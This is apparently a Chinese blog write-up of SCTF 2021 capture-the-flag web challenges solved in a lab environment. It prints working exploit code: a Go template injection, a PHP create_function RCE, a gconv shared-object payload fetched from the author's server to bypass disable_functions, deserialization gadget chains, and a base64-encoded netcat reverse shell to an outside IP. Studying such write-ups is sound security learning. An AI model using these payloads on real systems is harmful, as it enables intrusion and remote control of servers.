[NSSCTF][SCTF 2021]WEB复现

已于 2022-03-31 21:04:57 修改
阅读量1.9k 收藏 1
点赞数 2
分类专栏: 刷题记录 文章标签: 前端 web安全 php
于 2022-03-09 23:32:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cosmoslin/article/details/123390420
版权

感谢NSSCTF提供复现环境

loginme

middleware.go

package middleware

import (
	"github.com/gin-gonic/gin"
)

func LocalRequired() gin.HandlerFunc {
	return func(c *gin.Context) {
		if c.GetHeader("x-forwarded-for") != "" || c.GetHeader("x-client-ip") != "" {
			c.AbortWithStatus(403)
			return
		}
		ip := c.ClientIP()
		if ip == "127.0.0.1" {
			c.Next()
		} else {
			c.AbortWithStatus(401)
		}
	}
}

route.go

	age := TargetUser.Age
	if age == "" {
		age, flag = c.GetQuery("age")
		if !flag {
			age = "forever 18 (Tell me the age)"
		}
	}

x-forwarded-forx-client-ip都被ban了,用 x-real-ip绕过检测

image-20220208221637489

接下来是go的模板注入

?id=0&age={{.Password}}

image-20220208222121457

rceme

  • 无参rce

  • bypass disable function

<?php
if(isset($_POST['cmd'])){
    $code = $_POST['cmd'];
    if(preg_match('/[A-Za-z0-9]|\'|"|`|\ |,|-|\+|=|\/|\\|<|>|\$|\?|\^|&|\|/ixm',$code)){
        die('<script>alert(\'Try harder!\');history.back()</script>');
    }else if(';' === preg_replace('/[^\s\(\)]+?\((?R)?\)/', '', $code)){
        @eval($code);
        die();
    }
} else {
    highlight_file(__FILE__);
    var_dump(ini_get("disable_functions"));
}
?>

剩下符号:().:[]{}*%#@!~

剩余函数:

strlen
error_reporting
set_error_handler
create_function
preg_match
preg_replace
phpinfo
strstr
escapeshellarg
getenv
putenv
call_user_func
unserialize
var_dump
highlight_file
show_source
ini_get
end
apache_setenv
getallheaders

我们的目的是代码执行,可以利用create_function

这里逗号被过滤,为了传入参数,我们可以使用可变参数列表实现

在PHP 5.6以后,参数列表可以包括…,他表示函数接受可变数量的参数。参数将作为数组传递到给定的变量中

<?php
$args=['','}system("whoami");//'];
create_function(...$args);
?>

构造

create_function(...unserialize(end(getallheaders())))

传array(代码注入)反序列化变成两个参数传入create_function

create_funtion本质是语法解析的。可以直接注入eval

end — 将array的内部指针移动到最后一个单元并返回其值。    
getallheaders — 获取全部 HTTP 请求头信息

异或脚本:

def one(s):
    ss = ""
    for each in s:
        ss += "%" + str(hex(255 - ord(each)))[2:].upper()
    return f"[~{ss}][!%FF]("

while 1:
    a = input(":>").strip(")")
    aa = a.split("(")
    s = ""
    for each in aa[:-1]:
        s += one(each)
    s += ")" * (len(aa) - 1) + ";"
	print(s)

手动加 

[~%9C%8D%9A%9E%8B%9A%A0%99%8A%91%9C%8B%96%90%91][!%FF](...[~%8A%91%8C%9A%8D%96%9E%93%96%85%9A][!%FF]([~%9A%91%9B][!%FF]([~%98%9A%8B%9E%93%93%97%9A%9E%9B%9A%8D%8C][!%FF]())));

构造序列化内容

<?php
$arr=['','}eval($_POST["a"]);//'];
$str=serialize($arr);
echo $str;

image-20220210143453416

接下来绕过disable_functions

ByteCTF WP-无需mail bypass disable_functions

kali下创建

payload.c

#include <stdio.h>
#include <stdlib.h>

void gconv() {}

void gconv_init() {
  puts("pwned");
  system("bash -c '/readflag > /tmp/sna'");
  exit(0);
}

生成so文件

gcc payload.c -o payload.so -shared -fPIC

再创建一个gconv-modules文件

module  PAYLOAD//    INTERNAL    ../../../../../../../../tmp/payload    2
module  INTERNAL    PAYLOAD//    ../../../../../../../../tmp/payload    2

将两个文件放到服务器上,开启http服务共享

python -m http.server 39543

利用 SplFileObjectpayload.sogconv-modules

a=$url="http://xx.xx.171.248:39543/payload.so";$file1=new SplFileObject($url,'r');$a="";while(!$file1->eof()){$a=$a.$file1->fgets();}$file2 = new SplFileObject('/tmp/payload.so','w');$file2->fwrite($a);

a=$url = "http://xx.xx.171.248:39543/gconv-modules";$file1 = new SplFileObject($url,'r');$a="";while(!$file1->eof()){$a=$a.$file1->fgets();}$file2 = new SplFileObject('/tmp/gconv-modules','w');$file2->fwrite($a);

之后利用伪协议触发

a=putenv("GCONV_PATH=/tmp/");show_source("php://filter/read=convert.iconv.payload.utf-8/resource=/tmp/payload.so");

进行读取

a=show_source("/tmp/sna");

image-20220210153835755

upload it 1

下载附件,composer.json中有两个组件,下载

image-20220212164452034

  • symfony string:Provides an object-oriented API to strings and deals with bytes, UTF-8 code points and grapheme clusters in a unified way。
  • opis closure:A library that can be used to serialize closures (anonymous functions) and arbitrary objects.

给了源码,存在一个文件上传点,可以将文件传入/tmp/sandbox/xxxx的一个目录,当我们指定了PATH变量就会将/tmp/sandbox/xxxx与PATH进行一次拼接,之后把上传的文件放入该目录。

尝试上传,发现能够进行目录穿越,但无法上传到/var/www/html

源码关键部分:

if (!empty($_POST['path'])) {
    $upload_file_path = $_SESSION["upload_path"]."/".$_POST['path'];
    $upload_file = $upload_file_path."/".$file['name'];
} else {
    $upload_file_path = $_SESSION["upload_path"];
    $upload_file = $_SESSION["upload_path"]."/".$file['name'];
}
if (move_uploaded_file($file['tmp_name'], $upload_file)) {
    echo "OK! Your file saved in: " . $upload_file;
} else {
    echo "emm...Upload failed:(";
}

首先初始化的时候如果$_SESSION["upload_path"]为空则先设置$_SESSION["upload_path"]。然后进入到上面的代码,将$_SESSION["upload_path"]path进行拼接。

查看phpinfo发现session.save_path为no value即是默认的/tmp/sess_SESSIONID

考虑构造恶意session文件上传,之后利用反序列化执行恶意代码。利用之前组件中的__toString方法

最终POC如下:

<?php  
namespace Symfony\Component\String;  
class LazyString{  
     private $value;  
     public function __construct(){  
         require "../vendor/opis/closure/autoload.php";  
         $a = function(){system("cat /flag");};  
         $a = \Opis\Closure\serialize($a);  
         $b = unserialize($a);  
         $this->value=$b;  
     }  
}
print("upload_path|".serialize(new LazyString()));

upload it 2

思路和上题一样,不同的地方在于依赖中没有了opis/closure,不过题目中新增了一个sandbox类,里面的backdoor方法可以进行文件包含。

EXP:

<?php


namespace Symfony\Component\String{
    class LazyString{
        public $value;

        public function __construct($value){
            $this->value = $value;
        }
    }
}

namespace {
    class sandbox {
        public $evil;
        public function __construct(){
            $this->evil = "/flag";
        }
    }
    use Symfony\Component\String\LazyString;

    $value = [new sandbox,"backdoor"];

    $lazy = new LazyString($value);

    echo "upload_path |".serialize($lazy);

}

image-20220307085342106

ezosu

给了Dockerfile,其中有一处nginx反代和一个Imi框架的文件。

IndexController.php

if ($method === "POST") {
    Session::clear();
    $configData = $this->request->getParsedBody();
    foreach ($configData as $k => $v) {
        Session::set($k, $v);
    }
} else if ($method === "GET") {
    $configData = Session::get();
    if ($configData != null) {
        $res["value"] = $configData;
    } else {
        $res = [
            "msg" => "Not Find",
            "status" => "404",
            "value" => null
        ];
    }
}

session反序列化,考虑对session文件进行闭合

POC:

<?php
namespace Symfony\Component\String{
    class LazyString{
        public $value;
        public function __construct($value){
            $this->value=$value;
        }
    }
}

namespace PhpOption{
    final class LazyOption{
        public $callback;
        public $arguments;
        public function __construct($callback,$arguments){
            $this->callback=$callback;
            $this->arguments=$arguments;
        }
    }
}
namespace {
    use Symfony\Component\String\LazyString;
    $la = new LazyString([new PhpOption\LazyOption("system",array('echo$IFS$9cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMS4xMTcuMTcxLjI0OCAzOTU0MiA+L3RtcC9m|base64$IFS$9-d|sh')),"get"]);
    #docker没bash
    echo urlencode(serialize($la));
}

FUMO_on_the_Christmas_tree

用正则表达式提取出类名、方法名、类能调用到的成员变量的方法名,然后使用字典进行映射方便快速查找。然后以__destruct()方法为入口进行搜索,直到最后遇到readfile()方法。

import re
import base64

otov = {}
vtoo = {}
otoc = {}
ctoo = {}
otof = {}
ftoo = {}
otoa = {}
classes = {}

def trav(name, cls, al):
    if "fumo" in classes[name]:
        print("->".join(cls))
        print(f"start->{'->'.join(al)}->end",end="\n\n")
        return 1
    for call in otoc[name]:
        if call in ftoo.keys():
            next = ftoo[call]
            if next not in cls:
                trav(next, cls + [next], al+[otoa[name]])
    return 0

if __name__ == "__main__":
    with open("class.code") as f:
        text = f.read()
        res = re.findall("class[\w\W]+?}[\w\W]+?}", text)
        for i in res:
            name = re.findall("class (\w+)", i)[0]
            classes[name] = i
            fs = re.findall("public object (\$\w+?);", i)
            otov[name] = fs
            for fc in fs:
                vtoo[fc] = name
            calls = re.findall("\$this->\w+?->(\w+)\(", i)
            calls1 = []
            a = re.findall("@\$(\w+) = (\w+?)?[(]?\$(\w+)[)]?;", i)
            disable = ("md5", "sha1", "crypt", "ucfirst")
            for call in calls:
                ctoo[call] = name
                if len(a) == 0 and "crypt" not in i:
                        calls1.append(call)
                        otoa[name]=""
                else:
                    if len(a) == 0:
                        a = re.findall("@\$(\w+) = (\w+?)?[(]?\$(\w+), \'\w+?\'[)]?;", i)
                    if len(a)==1:
                        a = list(a[0])
                        if "crypt" in i:
                            a[1] = "crypt"
                    otoa[name] = a[1]
                    if a[0] == a[2] and (
                        a[1] != ""
                        and not (a[1] in disable and i.find(a[1]) < i.find(call))
                        or a[1] == ""):
                        calls1.append(call)
            calls2 = re.findall("@call_user_func\(\$this->\w+?, \[\'(\w+?)\' => \$\w+?]\);", i)
            if calls2:
                ctoo[name] = calls2[0]
                otoa[name] = ""
            otoc[name] = calls1 + calls2
            func = re.findall("function (\w+?)\(", i)[0]
            ftoo[func] = name
            otof[name] = func

            if func == "__call":
                calls = re.findall("=> '(\w+?)'", i)
                otoc[name] = calls
                ctoo[calls[0]] = name
                func = re.findall("\[\$this->\w+?, \$(\w+)?\]", i)[0]
                otof[name] = func
                ftoo[func] = name
                otoa[name] = ""
            elif func == "__invoke":
                calls = re.findall("\$this->\w+?->(\w+?)\(", i)
                otoc[name] = calls
                ctoo[calls[0]] = name
                func = re.findall("\$key = base64_decode\('(.+?)'\);", i)[0]
                func = base64.b64decode(func.encode()).decode()
                otof[name] = func
                ftoo[func] = name
                otoa[name] = ""
        trav(ftoo["__destruct"], [ftoo["__destruct"]],[])

参考:

https://eastjun.top/2021/12/28/sctf2021/

http://www.yongsheng.site/2022/01/03/SCTF2021%20web/

Snakin_ya
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[SCTF2021]Upload_it_1闭包组件反序列化rce
Huamang的博客
02-11 3362
题目地址 SycloverTeam提供了题目的docker环境 https://github.com/SycloverTeam/SCTF2021/tree/master/web/Upload_it_1 wp 首先题目给了composer.json { "name": "sctf2021/upload", "authors": [ { "name": "AFKL", "email": "upload@qq.com"
Hacker‘s Playground(SSTF) 2021 Web
feng的博客
08-17 283
Flag Submission SCTF{It_15_tim3_t0_hack!!} SQLi 101 ?id=admin'%23&pw=1 SQLi 102 ?searchkey=-1'union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_name = 'findme' %23 ​ SW Expert Academy 一道离谱的题目,输入C程序然后会运
2024年网络安全最新[SWPU CTF]之Misc篇(NSSCTF)刷题记录⑥_nssctfmisc(2)
最新发布
05-03 1059
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
buuctf刷题12(zip://包含& 取反+无参数rce & csrf & FFI扩展安全)
weixin_63231007的博客
02-19 1187
[极客大挑战 2020] Roamphp 1、2、4 rceme、5、6 flagshop、7 & 鹏程杯-简单的php
预备-刷题记录二
plant1234的博客
03-29 1270
首先打开题目得到:分析代码发第一个判断语句过滤了字母数字和一些字符,就可以考虑用取反,异化来绕过第二个判断限定了只能用函数的方式,并且函数里面不能有参数,例如:system() 或者 system(fun())能过判断所有是无参数,REC首先可以想到用php中的函数getallheaders()获取请求头current()获取第一键值。
ctf之crypto练习二
渗透测试研究中心
01-16 8986
一、js代码分析之编码转换writeup:打开index.html<script src="script-min.js"></script> //首先调用.js脚本 <script type="text/javascript"> var ic = false; #默认ic值为false var ...
SCTF2020:SCTF2020
04-01
7. **Web安全**:结合Java Web开发,了解SQL注入、XSS跨站脚本攻击、CSRF跨站请求伪造等常见攻击手段,以及相应的防御策略。 8. **密码学**:理解Java提供的加密库如Java Cryptography Architecture (JCA),熟悉...
SCTF差分晶振15013896510
06-21
SCTF差分晶振15013896510 SCTF差分晶振15013896510是一款差分晶振器件,提供了高频率稳定性和低抖动特性,适用于高速应用场景。 电气参数: * 频率:106.25、125、155.52、161.1328、187.5、312.5MHz * 频率稳定...
sctf2014 misc400b.rar
09-30
sctf2014 misc400b.rar
java版sm4源码-SCTF2019-Write-Up:SCTF2019报道
06-04
SCTF 2019 官方 Write-Up Misc 签到 出题人: XXX 解题人数: 260 最终分数:71 [removed]/9j/4QBkRXhpZgAATU0AKgAAAAgABYdp... 给了个图片的base64编码,某些浏览器可能渲染会截断,本来想放hint提示浏览器问题,但是...
CTF-PWN学习-为缺少指导的同学而生
热门推荐
yuwoxinanA3的博客
05-11 1万+
入门PWN不可能无痛,但尽量会减轻大家的痛苦,怎么说呢,就像博主在你们前面一步的位置,帮你们挡着一点风浪前进。
SCTF 2020 部分WEB writeup
qq_21912769的博客
07-07 673
Web CloudDisk Score: 250 flag: SCTF{47cf9489d8832e44312dssxag6f88f45736e0e9c8} https://github.com/dlau/koa-body/issues/75 http://120.79.1.217:7777/uploadfile { "files": { "file": { "name": "jankincai", "path": "./flag" } } } Upload success
BUUCTF-[SCTF2019]Flag Shop
qq_24033605的博客
11-04 4334
[SCTF2019]Flag Shop 简单看一下几个按钮的作用,buy flag是购买flag的按钮,但是当前的JinKela不够买不起,reset是重置按钮,work是工作按钮,可以赚取JinKela,但是每次只能赚取一小部分。(除非你足够闲,一直点到所需的数量然后购买flag) 这三个按钮干不成大事,目录扫描,扫到robots.txt 查看页面备份文件 这里可以看到源码~~(本菜狗没学过Ruby,哭了)~~ 问题不大,看到了JWT,先抓个包看一下, 找到了jkl的位置,但是缺少密钥对其进行加
NSSCTF题解
网络安全爱好者,分享渗透测试、漏洞复现、src挖掘,靶场搭建知识和技巧
03-17 1078
首先看这个代码的逻辑,我们的可控点是content,同时可以写入文件进去,在unzip函数中extractTo可以解压/tmp的文件到$_SERVER['DOCUMENT_ROOT']."/static/upload/".md5($filename),然后经过一大堆过滤,最后就是unlink删除文件,所以我们可以进行条件竞争,在解压文件和删除文件进行竞争。就可以查询出flag。响应中的hash值随着name参数的变化而变化,但又不完全是md5加密的值,这里看提示后,直接构造payload。
nssctf web 入门(3)
qq_61988806的博客
04-13 1142
这里通过nssctf的题单入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10篇。
nssctf web入门(4)
qq_61988806的博客
04-16 680
这里通过nssctf的题单入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10篇。
nssctf web入门(2)
qq_61988806的博客
04-13 806
这里通过nssctf的题单入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10篇。
NSSCTF-Web刷题记录一
plant1234的博客
03-11 1370
通过题目分析要去查看flag.php内容,进行实,所以以Try_Work_Hard为链子低端进行分析首先要利用的是include函数,但需要用__invoke方法来调用__invoke的触发条件是:当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用所以我们要找一个可以被控制且被调用的函数给它赋值Try_Work_Hard对象该类中在__get()方法可以实这一功能,但__get()方法的触发需要:从不可访问的属性读取数据。
SCTF2020官方Write-up:Web安全漏洞与修案例分析
SCTF2020官方Write-up中,参赛者们探讨了一道关于Web安全的挑战,涉及到了Node.js后端开发中的文件上传漏洞。题目提供的源码显示,一个名为`uploadfile`的路由处理POST请求中的文件上传,使用了Koa框架和`crypto`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值